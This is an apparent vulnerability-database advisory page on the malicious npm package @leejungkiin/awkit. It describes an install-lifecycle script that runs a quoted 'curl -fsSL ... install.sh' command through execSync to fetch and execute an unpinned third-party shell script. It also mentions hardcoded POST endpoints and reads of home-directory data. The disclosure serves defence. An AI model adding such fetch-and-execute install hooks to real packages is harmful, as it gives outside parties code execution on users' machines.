🛡️ MAL-2026-13427 — awkit
Description
Malicious code in @leejungkiin/awkit (npm)
Source: amazon-inspector
The package ships scripts/dependency-manager.js which, when run as part of the install lifecycle, invokes execSync('curl -fsSL https://raw.githubusercontent.com/rtk-ai/rtk/refs/heads/master/install.sh...') to fetch and execute an installer script from the rtk-ai/rtk repository on a mutable master branch. The fetched shell script is not pinned to a commit or hash and is controlled by a third-party GitHub account whose relationship to the @leejungkiin scope is not established. The same script also contacts https://www.rtk-ai.app and reads platform/home-directory information (os.homedir(), process.platform) during its operation. Because npm executes lifecycle scripts on install, this results in remote code execution from an unpinned, third-party-controlled source on the installer's machine, and the fetched code has full shell privileges to modify the environment, install further binaries, or exfiltrate host data. Additional bundled code (bin/awk.js, scripts/model-manager.js) combines child_process usage with hardcoded HTTP POST/fetch endpoints in a minified bundle.
Affected software
MAL-2026-13427 is recorded against 1 package.
- @leejungkiin/awkit
Timeline and source
Published on 6 August 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.
References
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
www.npmjs.com (Package)
Details
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| @leejungkiin/awkit | — | — |
References
More MAL 2026 advisories
Browse all of MAL 2026 in the advisory index.
Free Vulnerability Check
Is your site affected by MAL-2026-13427?
BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against MAL-2026-13427 and other known CVE records.
Scan My Site Free →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.